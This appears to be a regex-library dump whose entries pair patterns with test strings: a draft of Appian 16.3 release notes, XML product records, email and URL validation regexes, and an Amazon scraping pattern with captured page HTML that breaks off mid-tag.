can now save changes to tasks, allowing them to step away from long forms and come back to them later. ### Hierarchy Tree Browser ### The [Heirarchy Tree Browser](somelink) is a new component(?) that allows users to navigate heirarchical business data in a visual tree structure. This provides the same functionality as the [organization chart](link), but for a custom data set. <img src="images/tree-browser-screenshot.png" class="screenshot"/> [new screenshot will feature some annotations about its use case] In the above screenshot, we've created a browser for company ownership. LINK TO RECIPE. ### User Card for User Record Links ### Users will now see a user card when hovering on a [user record link](SAIL_Components.md#UserRecordLink) or a [record link](SAIL_Components.md#RecordLink) that navigates to a User record. This is supported for any component that can contain a link, such as the link, image, and rich text components. <img src="images/user-card-link-ss.png" class="screenshot"/> ### Microsoft Edge Browser Support ### Microsoft Edge is now supported for all user and most designer environments. See [Web Browsers](System_Requirements.html#Web_Browsers) for environments where Microsoft Edge is supported. ## Appian Designer ## This section describes new features in the Appian Designer environment. ### Improved Data-Type Management for Process Models ### When you [update a data type](Custom_Data_Types.md#Edit), references to that data type in process models are immediately updated to use the latest version without any additional steps. Because of this, you no longer need to include process models in your deployment patch when modifying the data types used by those process models. New process instances started from those models will use the new data type version. As was the case in previous releases, running processes will continue to use the version of the data type with which they started. <div class="tip">With the inclusion of process models in this release, all Appian design objects now benefit from improved data-type management.</div> ### Process Modeler Improvements (Preview Edition) ### The process modeler has been getting a lot of exciting changes, many of which are some of the most-requested features from our customers. Instead of making designers wait to try out the new process modeler, last quarter we released a functional [Preview Edition](Process_Modeler_Preview_Edition.html). While we're not quite ready to replace the existing process modeler with the new one, the Preview Edition remains available. <div class="note">If you want to use the old process modeler, simply open a process model with <b>Internet Explorer</b>. Opening a process model with <i>any other browser</i> will open it with the Preview Edition.</div> The following list of improvements apply only to the preview edition of the process modeler. #### Disable Email Notifications to Task Assignees #### You can now enable or disable email notifications when a task is assigned to users or groups. Email notifications are enabled by default, and can be configured from the [Assignment](Assignment_Tab.md) tab. <img src="images/release_notes/task_email_notifications.png" class="screenshot"/> #### Multi-Select #### You can now **Ctrl + Click** on nodes to select multiple nodes and annotations at the same time, and move them en-masse around your canvass. <img src="images/release_notes/process_modeler_multi_node_selection.gif" class="screenshot"/> #### Edge and Safari Browser Support #### In addition to Chrome and Firefox, the Preview Edition now supports Microsoft **Edge** and **Safari**. This allows designers to build process models in all [modern browsers](System_Requirements.md#Web_Browsers). #### Window Resize #### You can now resize the process modeler window. <img src="images/release_notes/process_modeler_resize_window.gif" class="screenshot"/> See [Process Modeler Preview Edition](Process_Modeler_Preview_Edition.md) for a complete list of improvements. ### Application Builder Improvements ### Last release, we introduced the application builder to help designers get a head start on creating new applications. This release we've added two important productivity features to the builder: [Sites](Sites.md) and [Task Reports](Task_Report_Tutorial.md). #### Sites for the Application Builder #### You can now generate a [site](Sites.md) for any application you create with the [application builder](appbuilderlink). Users will find a new checkbox when creating an application that allows them to generate a site. While the application will still be available in Tempo, users will also have the option of using it in the new site. #### Task Reports for the Application Builder #### Each application created through the application builder now comes with a task report, which shows all tasks for a user within the application. This report appears in the **Tasks** tab in Tempo and the **My Tasks** tab in sites (if there is one). <img src="images/Quick_Apps/quickAppsTaskReport.png" class="screenshot"/> ### Smart Defaults ### /v/ We've included some quality-of-life improvements for Appian designers that make building Appian applications a little faster and easier. /v/ We've added some pre-population to common fields to continue to improve the designer experience. /v/ To further improve the application-building experience, we've added default values to some of the common fields where designers manually enter values. #### Context for Related Actions #### When selecting a process model for a [new related action](Create_a_Record_Type.md#Add_a_Related_Action), we now populate the **Context** field with the [process parameters](Process_Variables.md#parameters) to get you started. <img src="images/release_notes_16_3/dictionary_prepopulates.png"> #### Save-Interface-As Dialog #### The interface designer's [Save As](link) function now pre-populates information for you when you save a form. When saving, your form name will be pulled from your interface and pre-populated into the name field in the **Save As** window. This not only saves you time, it also ensures the continuity of your material. <img src ="images/release_notes_16_3/save_as_prepopulation.png"> #### Save In Folder #### In Appian Designer, the **Save In** folder will be pre-populated for expression rules, interfaces, and constants at creation when the system can make a smart folder recommendation, so that designers can more quickly create objects. ### Multiple Sort for a!queryEntity() ### You can now sort on multiple columns when using [a!queryEntity()](System_Functions.md#a!queryEntity.28.29). To accomplish this, pass an array of [a!sortInfo()](System_Functions.md#a!sortInfo.28.29) functions into a `PagingInfo` data type. See [Query Recipes](Query_Recipes.md) for details on how to use this capability. ### Batch Testing Improvements ### Last release, we introduced [new batch-testing features](link to hl testing page) to facilitate faster development cycles with improved quality assurance. This release, we've made these features more interactive and granular to provide more flexibility in test management. #### New Data Types for Batch Testing of Expression Rules #### The [TestRunResult](Parsing_Batch_Test_Results_for_Expression_Rules.md#TestRunResult), [ApplicationTestResult](Parsing_Batch_Test_Results_for_Expression_Rules.md#ApplicationTestResult), [ObjectTestResult](Parsing_Batch_Test_Results_for_Expression_Rules.md#ObjectTestResult), and [TestCaseResult](Parsing_Batch_Test_Results_for_Expression_Rules.md#TestCaseResult) data types used by the [Start Rule Tests](Automated_Testing_for_Expression_Rules.md) smart services can now be used in expression rules, interfaces, and process models. This allows for easier management of the test results data throughout your application. /v/This allows designers to scale testing applications.... #### Application URL Available in Application Test Results #### A new field, `url`, has been added to the [ApplicationTestResult](Parsing_Batch_Test_Results_for_Expression_Rules.md#ApplicationTestResult) data type. The field provides the URL to the application whose test results the data is from. This provides a way to expose a link back to tested applications in application designer from the interfaces built to display expression rule test results. ### List Lengths in Expression Rule Designer ### The Test Output section of the expression rule designer now displays how many items are in the output of the rule when the output is a list. <img class="screenshot" src="images/ERD_List_Length.png"/> ### Web API URLs in Designer ### The URL for a Web API is now displayed in the test pane of the Web API Designer when the Web API is for `PUT`, `POST`, and `DELETE` Web APIs. The URL was already displayed for `GET` Web APIs. <img class="screenshot" src="images/release_notes/WebApiUrl.png"/> ### Save as Default Test Values Link Always Shown ### The **Save as default test values** link in the **Test** dialog of the [interface designer](Interface_Designer.md#Save_Default_Test_Values) is now always shown, even when the test values have not changed. This reduces the number of clicks that are required to update your default test values. ## Appian Administrators ## This section describes new features for administering Appian. ### Import and Export of Administration Console Settings ### Last release we made it possible to import and export administration console settings that were related to application development. Now all system settings (excluding custom authentication) can be imported and exported as well. <img class="screenshot" src="images/RN_AC_System_Settings_Grid.png"/> The new administration console settings available for import and export: * Appian Authentication * System Branding * Mobile Configurations * Deployment and Data Retention settings * Default User Profile Visibility * Editable User Profile Fields * Enabling Appian Email * Quick Apps Data Source #### Import Customization #### Since your authentication settings and system branding may be different across environments, all the values on the **Appian Authentication** and **Branding** pages can now be set during import using the [import customization file](Application_Deployment_Guidelines.md#Import_Customization) that was released in Appian 16.2. This allows you to import the same package to different environments with those different values, which means you never have to manually configure these settings in multiple environments again. ## Server Administration ## This section describes new features for server administrators. ### Process Execution Engine Throughput ### Responsibility for archiving processes has been moved from the process execution engines to the application server, which frees the process execution engines to spend a larger portion of their time executing processes. Sites with heavy load on the execution engines and lots of archiving should see increased process execution throughput from this change. ### Expression Rule Test Cases Metrics Log ### Various data metrics about expression rule test cases and their assertions are now available in `expression_rule_test_cases.csv` in the `<APPIAN_HOME>/logs/data-metrics` directory. See Also: [Expression Rule Test Cases Metrics Log](Logging.md#Expression_Rule_Test_Cases_Metrics_Log) ## Appian Developer ## This section describes new features for developers. ## Appian Cloud ## The following describes changes that affect all **Appian Cloud** customers. ### MySQL 5.7 ### MySQL Community Server 5.7 replaces MySQL Community Server 5.6 as the primary data source for Appian Cloud sites. Please review the following documentation from MySQL to learn more about the changes introduced in newer versions of MySQL: - https://dev.mysql.com/doc/refman/5.7/en/upgrading-from-previous-series.html We recommend reviewing these documents and update any incompatible query syntax you might be using in your applications. This can be completed before being converted to our latest release to avoid any problems. ### End of Support for TLS 1.0 in May of 2017 ### Appian Cloud will no longer be supporting TLS 1.0. All incoming web traffic to Appian Cloud sites will be encrypted using TLS 1.1 or TLS 1.2, both of which are already supported by Appian Cloud. The Payment Card Industry (PCI) security council released PCI Data Security Standard (DSS) 3.1. PCI DSS deprecated SSL 3.0 and TLS 1.0 as secure protocols. This change has been acknowledged as a best practice across the industry and all major service providers are removing or have removed TLS 1.0 for web traffic. More information about this change is avilable in our documentation: https://forum.appian.com/suite/help/16.2/kb/kb-1064.html ## Behavior Changes ## The changes documented below may affect your applications. Note both the previous and new behaviors and make any updates as needed to adjust for these changes upon migration to this version of Appian. ## Resolved Issues ## This release resolves the issues listed below. To assist you in your migration planning, issue severity is listed for each item. The values of high, medium, and low are based on the criteria of system availability, system integrity, and confidentiality. Use this information, along with how you use Appian, to evaluate the applicability of this version to your deployment. ### Appian Designer ### - **AN-50362** - Low <br/> When importing an update to a data store's entities you no longer need to import the package twice for all objects to import successfully. Objects referencing data store entities that are being added to a data store that is in the same import package and already exists on the target system will no longer fail to import. - **AN-69480** - Low <br/> User record links in SAIL no longer cause an error when the linked user is not visible or does not exist. Instead, the link displays, though the user record won't be displayed if the link is clicked. This matches the previously existing behavior of other record links. - **AN-57415** - Low <br/> Deleted data types no longer show up as missing precedents of process models that have process variables of those data types. - **AN-68455** **[BRETT TOO GENERIC]** - Low <br/> When an unexpected error occurs during application import, a detailed error message is now shown in the import result dialog. - **AN-68459** **[MISSING SOMETHING--A WORD?]** - Low <br/> When creating a data type from an XSD that contains both the data type and a precedent data type, the "Data type to be created" now correctly lists each data type only once. LAST PART IS STRANGE - **AN-67927** - Low <br/> Opening a process model from Appian Designer now consistently opens the process model in a new tab in the process modeler. Previously, certain navigation patterns would cause the process modeler window to refresh and close all existing tabs. - **AN-67939** - Low <br/> The color picker used in the font dialog and rich text editor shows the colors in the expected order. ### Appian Administration Console ### ### Server Administration ### ### Appian Developer ### ### Platform ### - **AN-63256** - Low <br/> The "Operation Name" field is now correctly recorded in `data_store_details.csv` for write to data store transactions. Previously the value would be recorded as `null`. - **AN-69497** - Low <br/> Quotation marks in exported application packages are now represented as `"` rather than `&quot;`. ## Deprecations ## The features listed below are deprecated and will be removed in a future release of Appian. Do not begin using deprecated features, and transition away from any prior usage of now deprecated features. Where applicable, supported alternatives are described for each deprecation. ### Application Portal ### The Application Portal has been deprecated and will be removed in a future release (no sooner than July 2018) of Appian. We recommend that you use [Tempo](Appian_Workspaces.md#tempo_interface), [sites](Sites.md), and/or [embedded interfaces](Embedded_Interfaces.md) as the environment(s) for your users. ### Communication Smart Services ### The following smart service has been deprecated: - Send Alert Designers should use the [Send Email Smart Service](Send_Email_Smart_Service.md) or [News](News.md) instead. ### Portal Management Smart Services ### The following smart services have been deprecated: - Create Case Management Page - Create Page - Delete Page - Edit Page Properties - Modify Page Security - Publish Page - Set Global Home Page - Set User Home Page Designers should use [Tempo](Appian_Workspaces.md#tempo_interface), [Sites](Sites.md), and [Embedded Interfaces](Embedded_Interfaces.md) instead. ### Communities ### Communities have been deprecated. Since Appian 7.9, it has been possible to create Knowledge Centers without a parent, so Communities are no longer necessary for application design. Designers should use [Knowledge Centers](Document_Management.md#Knowledge_Centers) instead. ### Document Management Smart Services ### The following smart services have been deprecated along with Communities: - Add Attachment - Delete Community - Edit Community Properties - Modify Community Security - Move Community - Move KC - Reactivate Community - Set User Storage Space Designers should use [Knowledge Centers](Document_Management.md#Knowledge_Centers) instead. ### Forum-related Data Types ### The following data types have been deprecated: - Forum - Message - Discussion Thread Designers should use [Social Smart Services](Smart_Services.md#Social) rather than Forum Management Smart Services for all process-based collaboration. See also [Tempo Interface](Appian_Workspaces.md#tempo_interface) and [News](News.md) for additional information on colaboration functionality. ### Attachments and Notes on Process Models ### The ability to add attachments and notes to process models has been deprecated. Designers should use [Document Management](Document_Management.md) and [Data Stores](Data_Stores) instead. ### Deprecated System Groups ### The following system groups have been deprecated and are no longer recommended for application design. * Document Administrators: Members of this group can administer applications and data stores as well as the objects in the Rules and Documents tabs of */designer*. Appian recommends using object security to configure user access to design objects. * Portal Administrators: Administration of Appian should be done by users of type System Administrator. * Tempo Global Message Authors: Since all users are able to post messages in Tempo that can be viewed by all users, use of this group is no longer necessary. ### Public Java APIs Deprecated ### The acquisition of Appian services from `ServiceLocator.java` has been deprecated. Appian services should be acquired through service injection from the Appian plug-in framework. As such, the following API class and all of its methods have been deprecated. * `com.appiancorp.suiteapi.common.ServiceLocator.java` The following methods were needed to use the Appian service APIs from a standalone application, support for which was previously removed. As such these methods are being phased out of the public API and have been deprecated: * `com.appiancorp.suiteapi.cfg.ConfigurationLoader.initializeConfigurations` * `com.appiancorp.suiteapi.cfg.ConfigurationLoader.isInitialized` ### Publishing Process Models as Web Services via UDDI ### The ability to publish process models as web services to a a UDDI registry has been deprecated. Publishing process models as web services without using a UDDI registry is not deprecated. ### TLS 1.0 on Appian Cloud ### Support for TLS 1.0 on Appian Cloud sites is deprecated and will be removed in the future. Browsers and other clients that wish to connect to Appian Cloud sites should use TLS 1.1 or 1.2. See [kb-1064](kb/kb-1064.md) for more detail. This is a global deprecation for Appian Cloud regardless of the version of individual Appian Cloud sites. This deprecation does not affect on-premise installations. ### Web.xml Modifications ### Previous versions of Appian required modifying a file called `web.xml` in order to make certain configuration changes. Support for configuring or customizing Appian by making changes to the `web.xml` file is deprecated and will not be supported in a future release. The one exception to this is changing local installations from running over HTTPS to running over HTTP. ### Multiple Gateways on Windows Environments ### The ability to configure [multiple gateways](Creating_a_Dual_Gateway_Topology.md) in a Windows environment has been deprecated. Multiple gateways continue to be supported in [Linux environments](Creating_a_Distributed_Environment_on_Linux.md). ## Removals ## The following features have been removed from Appian and are no longer available for use. If you are using any of these features, you must move away from their use before upgrading to this version. ### Microsoft Internet Explorer 9 & 10 ### Support for Microsoft Internet Explorer 9 and 10 have been removed as of this version of Appian. See [Web Browsers](System_Requirements.md#Web_Browsers) for a list of supported browsers. ### Public Java APIs Removed ### The following API classes have been removed from the public API: * `com.appiancorp.services.ASLIdentity.java` * `com.appiancorp.services.ContextSensitiveService.java` * `com.appiancorp.services.ExtendedServiceLocator.java` * `com.appiancorp.services.ReleasableService.java` * `com.appiancorp.services.ServiceConfiguration.java` * `com.appiancorp.services.ServiceInfo.java` * `com.appiancorp.services.ServiceManager.java` * `com.appiancorp.services.ServiceManager.ListNamingEnumeration.java` * `com.appiancorp.services.ServiceManager.ServiceInvocationHandler.java` * `com.appiancorp.services.ServiceManagerConfigurator.java` * `com.appiancorp.services.ServiceParameter.java` * `com.appiancorp.services.ServiceProperty.java` * `com.appiancorp.services.SimpleASLIdentity.java` ### Stacked Bar Chart ### The stacked bar chart component has been removed. Instead, use the [bar chart component](SAIL_Components.md#BarChart) with the stacking option.
Find ToCs
2016-08-04T16:39:52.000Z
<Row>w+
<Row> <INVOICE_NUMBER>NULL</INVOICE_NUMBER> <KOD_MATER>232820</KOD_MATER> <KOD_EAN>4620008991313</KOD_EAN> <SERIA>100</SERIA> <D_BEGIN>224515001</D_BEGIN> <D_END>224520000</D_END> <EGAIS>0150117000001837067</EGAIS> <N_ZAYAV>82</N_ZAYAV> <N_GTD>NULL</N_GTD> <MANUFACTURE>5029047184</MANUFACTURE> <DATE_BOTTLING>24.07.2014</DATE_BOTTLING> </Row> <Row> <INVOICE_NUMBER>NULL</INVOICE_NUMBER> <KOD_MATER>232820</KOD_MATER> <KOD_EAN>4620008991313</KOD_EAN> <SERIA>100</SERIA> <D_BEGIN>224520001</D_BEGIN> <D_END>224525000</D_END> <EGAIS>0150117000001837067</EGAIS> <N_ZAYAV>82</N_ZAYAV> <N_GTD>NULL</N_GTD> <MANUFACTURE>5029047184</MANUFACTURE> <DATE_BOTTLING>24.07.2014</DATE_BOTTLING> </Row>
111
2015-06-26T07:26:31.000Z
(?<email>(?<username>[\w\W]+)@(?<domain>[\w\W]+\.[\w\W]+|localhost))
Verify and match e-mail address
2013-09-08T13:28:32.000Z
^(([^<>()\[\]\\.,;:\s@"]+(\.[^<>()\[\]\\.,;:\s@"]+)*)|(".+"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$
Email address validation
2016-08-23T21:22:00.000Z
Check if string contains a valid HTTP / HTTPS link
^(http|https):\/\/
https://images.unsplash.com/photo-1441742917377-57f78ee0e582?q=80&fm=jpg&s=a79e8a2beba8b3a1ad251798a9024d8b http://stackoverflow.com/questions/10625497/regex-to-check-if-http-or-https-exists-in-the-string Http://thepaperwall.com/wallpaper.php?view=4d119619f49377f7aacc7efe564c3bf890b3c063 hTTp://thepaperwall.com/wallpapers/girls/big/big_4d119619f49377f7aacc7efe564c3bf890b3c063.jpg
HTTP / HTTPS link check
2015-10-04T13:44:48.000Z
[A-Z][0-9][a-z]
A3s
[A-Z][0-9][a-z]
2016-03-02T08:20:27.000Z
<div\sid=\"olpProduct[\s\S]*?<div[\s\S]*?<div[\s\S]*?<a\shref=\"[\s\S]*?\/\/www.amazon.com\/[\s\S]*?\/[\s\S]*?\/(.*?)\/ref=olp
<div id="olpProduct" class="a-section a-spacing-none"> <div class="a-section a-spacing-mini"> <div class="a-section a-spacing-mini"> ‹ <a href="https://www.amazon.com/Keds-Womens-Chillax-Laceless-Sneaker/dp/B00MC3R3M6/ref=olp_product_details?_encoding=UTF8&amp;me=" id="olpDetailPageLink">Return to product information</a> <i class="a-icon a-icon-text-separator" role="img"></i> Every purchase on Amazon.com is protected by an <a href="/gp/help/customer/display.html/ref=olp_wa_1?ie=UTF8&amp;nodeId=537868&amp;pop-up=1" id="olpAZGuarantee" target="AmazonHelp" onclick="return amz_js_PopWin('/gp/help/customer/display.html/ref=olp_wa_1?ie=UTF8&amp;nodeId=537868&amp;pop-up=1','AmazonHelp','width=400,height=400,resizable=1,scrollbars=1,toolbar=1,status=1');">A-to-z guarantee</a>. <i class="a-icon a-icon-text-separator" role="img"></i> Feedback on this page? <a class="a-link-normal olpFeedbackLink" href="/forms/33ec5bb5-b0aa-4730-9bba-9b346c8d2499"> Tell us what you think </a> </div> <div class="a-fixed-left-grid a-spacing-base"><div class="a-fixed-left-grid-inner" style="padding-left:170px"> <div id="olpProductImage" class="a-text-center a-fixed-left-grid-col a-col-left" style="width:170px;margin-left:-170px;float:left;"> <a class="a-link-normal" href="https://www.amazon.com/Keds-Womens-Chillax-Laceless-Sneaker/dp/B00MC3R3M6/ref=olp_product_details?_encoding=UTF8&amp;me="> <img alt="Return to product information" src="https://images-na.ssl-images-amazon.com/images/I/41p2f8xA8TL._SS160_.jpg"> </a> </div> <div id="olpProductDetails" class="a-fixed-left-grid-col a-col-right" style="padding-left:0%;float:left;"> <h1 class="a-size-large a-spacing-none" role="main"> <div class="a-section a-spacing-none olpSubHeadingSection"> <span class="a-size-base a-color-secondary"> </span> </div> Keds Women's Chillax Washed Laceless Slip-On Sneaker, Taupe, 8 M US </h1> <div id="olpProductByline" class="a-section a-spacing-mini"> by Keds </div> <div class="a-section a-spacing-small"> <span class="offerListingPageB00MC3R3M6"> <span class="a-declarative" data-action="a-popover" data-a-popover="{&quot;closeButton&quot;:&quot;false&quot;,&quot;max-width&quot;:&quot;700&quot;,&quot;position&quot;:&quot;triggerBottom&quot;,&quot;url&quot;:&quot;/review/widgets/average-customer-review/popover/ref=acr_offerlistingpage_popover?ie=UTF8&amp;asin=B00MC3R3M6&amp;contextId=offerListingPage&amp;ref=acr_offerlistingpage_popover&quot;}"> <a href="javascript:void(0)" class="a-popover-trigger a-declarative"> </a><a class="a-link-normal a-text-normal" href="https://www.amazon.com/product-reviews/B00MC3R3M6/ref=acr_offerlistingpage_text?ie=UTF8&amp;showViewpoints=1"> <i class="a-icon a-icon-star a-star-4-5"><span class="a-icon-alt">4.3 out of 5 stars</span></i> </a> <i class="a-icon a-icon-popover"></i> </span> <span class="a-letter-space"></span> <span class="a-size-small"> <a class="a-link-normal" href="https://www.amazon.com/product-reviews/B00MC3R3M6/ref=acr_offerlistingpage_text?ie=UTF8&amp;showViewpoints=1"> 1,015 customer reviews </a> </span> </span> <i class="a-icon a-icon-text-separator" role="img"></i> <style type="text/css"> #auiswfText:hover, .emailImg:hover, .tafSocial:hover{ text-decoration : none !important; } #tellafriendAUI .emailtext, #tellafriendAUI .emailImg, #tellafriendAUI .tafSocial { padding : 0px !important; margin : 0px !important; text-decoration : none !important; } </style> <span id="tellafriendAUI"> <span class="a-declarative" data-action="a-modal" data-a-modal="{&quot;width&quot;:450,&quot;popoverLabel&quot;:&quot;Share this via Email&quot;,&quot;name&quot;:&quot;taf-aui&quot;,&quot;url&quot;:&quot;/gp/taf/share.html/ref=cm_sw_p_view_ol_4CVhCbJV9Y2JE?ie=UTF8&amp;ASIN=B00MC3R3M6&amp;action=share&amp;contentID=B00MC3R3M6&amp;contentName=offer%20listing%20page&amp;contentType=offer_page&amp;contentURI=%2Fgp%2Foffer-listing%2FB00MC3R3M6&amp;emailTemplate=%2Fgp%2Fpdp%2Ftaf%2Femail%2Fshare-offer-listing-page&amp;placementID=ol_4CVhCbJV9Y2JE&amp;ref=cm_sw_p_view_ol_4CVhCbJV9Y2JE&amp;showSocialSites=1&amp;site=email&amp;tafAUI=1&amp;titleText=Amazon.com%3A%20Buying%20Choices%3A%20Keds%20Women%27s%20Chillax%20Washed%20Laceless%20Slip-On%20Sneaker%2C%20Taupe%2C%208%20M%20US&amp;view=popup&quot;,&quot;ajaxFailMsg&quot;:&quot;Sorry, content is not available. &quot;,&quot;header&quot;:&quot;Share this via Email&quot;,&quot;cache&quot;:&quot;false&quot;}" id="swfDeclarative"> <a id="auiswfText" class="a-link-normal emailtext" title="Share via e-mail" href="/gp/taf/share.html/ref=cm_sw_l_view_ol_4CVhCbJV9Y2JE?ie=UTF8&amp;ASIN=B00MC3R3M6&amp;action=share&amp;contentID=B00MC3R3M6&amp;contentName=offer%20listing%20page&amp;contentType=offer_page&amp;contentURI=%2Fgp%2Foffer-listing%2FB00MC3R3M6&amp;emailTemplate=%2Fgp%2Fpdp%2Ftaf%2Femail%2Fshare-offer-listing-page&amp;placementID=ol_4CVhCbJV9Y2JE&amp;ref=cm_sw_l_view_ol_4CVhCbJV9Y2JE&amp;showSocialSites=1&amp;site=email&amp;tafAUI=1&amp;titleText=Amazon.com%3A%20Buying%20Choices%3A%20Keds%20Women%27s%20Chillax%20Washed%20Laceless%20Slip-On%20Sneaker%2C%20Taupe%2C%208%20M%20US&amp;view=standalone"> <span class="shareTextAUI">Share</span><span class="a-letter-space"></span> </a> <a id="auiSwfEmail" class="a-link-normal emailImg" title="Share via e-mail" href="#"> <i class="a-icon a-icon-share-email" role="img"></i><span class="a-letter-space"></span> </a> </span> <a id="auiSwfFb" class="a-link-normal tafSocial" title="Share on Facebook" href="/gp/taf/share.html/ref=fa?ie=UTF8&amp;=&amp;ASIN=B00MC3R3M6&amp;action=share&amp;contentID=B00MC3R3M6&amp;contentName=offer%20listing%20page&amp;contentType=offer_page&amp;contentURI=%2Fgp%2Foffer-listing%2FB00MC3R3M6&amp;imageURL=&amp;placementID=ol&amp;reftagSuffix=&amp;site=facebook&amp;titleText=Amazon.com%3A%20Buying%20Choices%3A%20Keds%20Women%27s%20Chillax%20Washed%20Laceless%20Slip-On%20Sneaker%2C%20Taupe%2C%208%20M%20US"> <span class="windowParams" data-network="facebook" data-height="400" data-width="700"></span> <i class="a-icon a-icon-share-facebook" role="img"></i><span class="a-letter-space"></span> </a> <a id="auiSwfTw" class="a-link-normal tafSocial" title="Share on Twitter" href="/gp/taf/share.html/ref=tw?ie=UTF8&amp;=&amp;ASIN=B00MC3R3M6&amp;action=share&amp;contentID=B00MC3R3M6&amp;contentName=offer%20listing%20page&amp;contentType=offer_page&amp;contentURI=%2Fgp%2Foffer-listing%2FB00MC3R3M6&amp;imageURL=&amp;placementID=ol&amp;reftagSuffix=&amp;site=twitter&amp;titleText=Amazon.com%3A%20Buying%20Choices%3A%20Keds%20Women%27s%20Chillax%20Washed%20Laceless%20Slip-On%20Sneaker%2C%20Taupe%2C%208%20M%20US"> <span class="windowParams" data-network="twitter" data-height="400" data-width="700"></span> <i class="a-icon a-icon-share-twitter" role="img"></i><span class="a-letter-space"></span> </a> </span> <script language="JavaScript" type="text/JavaScript"> P.when('A','jQuery').execute(function(A,$) { $('.tafSocial').unbind('click').click(function() { var windowParams = $(this).children('.windowParams'); var height = windowParams.data("height"); var width = windowParams.data("width"); window.open(this.href, "_blank", "location=yes,width=" + width +",height=" + height); return false; }); A.on.load(function () { var hashValue = window.location.hash; var hashIndex; var swfHashValue = "_swftext_Swf"; hashIndex = hashValue.indexOf(swfHashValue); if (hashValue != "" && hashIndex > -1 && typeof(window.swfPopUpShown) === 'undefined') { $("#auiswfText").click(); window.swfPopUpShown = 1; } }); }); </script> </div> <div id="variationsTwister" class="a-section a-spacing-mini"> <div class="a-section a-spacing-micro"> <span class="a-size-base">Size:</span> <span class="a-size-base a-text-bold"></span> </div> <span class="a-dropdown-container"><select name="" autocomplete="off" data-a-native-class="olpTwisterDropdown" tabindex="-1" class="a-native-dropdown a-spacing-small olpTwisterDropdown"> <option value="/gp/offer-listing/B00NNA39IE/ref=olp_twister_all?ie=UTF8&amp;mv_color_name=3&amp;mv_size_name=all"> Lowest offer for each </option> <option value="/gp/offer-listing/B00MC3QSKO/ref=olp_twister_child?ie=UTF8&amp;mv_color_name=3&amp;mv_size_name=0"> 5 M US </option> <option value="/gp/offer-listing/B00MC3QU1G/ref=olp_twister_child?ie=UTF8&amp;mv_color_name=3&amp;mv_size_name=1"> 5.5 M US </option> <option value="/gp/offer-listing/B00MC3QX72/ref=olp_twister_child?ie=UTF8&amp;mv_color_name=3&amp;mv_size_name=2"> 6 M US </option> <option value="/gp/offer-listing/B00MC3QYQC/ref=olp_twister_child?ie=UTF8&amp;mv_color_name=3&amp;mv_size_name=3"> 6.5 M US </option> <option value="/gp/offer-listing/B00MC3R0PQ/ref=olp_twister_child?ie=UTF8&amp;mv_color_name=3&amp;mv_size_name=4"> 7 M US </option> <option value="/gp/offer-listing/B00MC3R23Q/ref=olp_twister_child?ie=UTF8&amp;mv_color_name=3&amp;mv_size_name=5"> 7.5 M US </option> <option value="/gp/offer-listing/B00MC3R3M6/ref=olp_twister_child?ie=UTF8&amp;mv_color_name=3&amp;mv_size_name=6" selected=""> 8 M US </option> <option value="/gp/offer-listing/B00MC3R6LO/ref=olp_twister_child?ie=UTF8&amp;mv_color_name=3&amp;mv_size_name=7"> 8.5 M US </option> <option value="/gp/offer-listing/B00MC3R9IY/ref=olp_twister_child?ie=UTF8&amp;mv_color_name=3&amp;mv_size_name=8"> 9 M US </option> <option value="/gp/offer-listing/B00MC3RBE6/ref=olp_twister_child?ie=UTF8&amp;mv_color_name=3&amp;mv_size_name=9"> 9.5 M US </option> <option value="/gp/offer-listing/B00MC3RCPY/ref=olp_twister_child?ie=UTF8&amp;mv_color_name=3&amp;mv_size_name=10"> 10 M US </option> </select><span tabindex="-1" id="olpTwisterDropdownAUI" class="a-button a-button-dropdown a-button-small a-spacing-small" style="min-width: 0.583333%;"><span class="a-button-inner"><span class="a-button-text a-declarative" data-action="a-dropdown-button" role="button" tabindex="0" aria-hidden="true"><span class="a-dropdown-prompt"> 8 M US </span></span><i class="a-icon a-icon-dropdown"></i></span></span></span> <div class="a-section a-spacing-micro"> <span class="a-size-base">Color:</span> <span class="a-size-base a-text-bold">Taupe</span> </div> <ul class="a-unordered-list a-nostyle a-button-list a-declarative a-button-toggle-group a-horizontal a-spacing-small" role="radiogroup" data-action="a-button-group"> <li class="a-spacing-mini"><span class="a-list-item"> <span class="a-button a-button-normal a-button-thumbnail a-button-toggle" id="a-autoid-0"><span class="a-button-inner"><a href="/gp/offer-listing/B0002MB0DM/ref=olp_twister_child?ie=UTF8&amp;mv_color_name=0&amp;mv_size_name=6" class="a-button-text" role="button" id="a-autoid-0-announce"> <img alt="" src="https://images-na.ssl-images-amazon.com/images/I/41jl1EwZjHL._SX35_SY35_CR,0,0,35,35_.jpg" height="35" width="35"> </a></span></span> </span></li> <li class="a-spacing-mini"><span class="a-list-item"> <span class="a-button a-button-normal a-button-thumbnail a-button-toggle" id="a-autoid-1"><span class="a-button-inner"><a href="/gp/offer-listing/B005BFV1DO/ref=olp_twister_child?ie=UTF8&amp;mv_color_name=1&amp;mv_size_name=6" class="a-button-text" role="button" id="a-autoid-1-announce"> <img alt="" src="https://images-na.ssl-images-amazon.com/images/I/41XqEgaqwtL._SX35_SY35_CR,0,0,35,35_.jpg" height="35" width="35"> </a></span></span> </span></li> <li class="a-spacing-mini"><span class="a-list-item"> <span class="a-button a-button-normal a-button-thumbnail a-button-toggle" id="a-autoid-2"><span class="a-button-inner"><a href="/gp/offer-listing/B00MC3SFXW/ref=olp_twister_child?ie=UTF8&amp;mv_color_name=2&amp;mv_size_name=6" class="a-button-text" role="button" id="a-autoid-2-announce"> <img alt="" src="https://images-na.ssl-images-amazon.com/images/I/41cNhnckTFL._SX35_SY35_CR,0,0,35,35_.jpg" height="35" width="35"> </a></span></span> </span></li> <li class="a-spacing-mini"><span class="a-list-item"> <span class="a-button a-button-selected a-button-thumbnail a-button-toggle" id="a-autoid-3"><span class="a-button-inner"><a href="/gp/offer-listing/B00MC3R3M6/ref=olp_twister_child?ie=UTF8&amp;mv_color_name=3&amp;mv_size_name=6" class="a-button-text" role="button" id="a-autoid-3-announce"> <img alt="" src="https://images-na.ssl-images-amazon.com/images/I/41p2f8xA8TL._SX35_SY35_CR,0,0,35,35_.jpg" height="35" width="35"> </a></span></span> </span></li> <li class="a-spacing-mini"><span class="a-list-item"> <span class="a-button a-button-normal a-button-thumbnail a-button-toggle" id="a-autoid-4"><span class="a-button-inner"><a href="/gp/offer-listing/B011SBR9PS/ref=olp_twister_child?ie=UTF8&amp;mv_color_name=4&amp;mv_size_name=6" class="a-button-text" role="button" id="a-autoid-4-announce"> <img alt="" 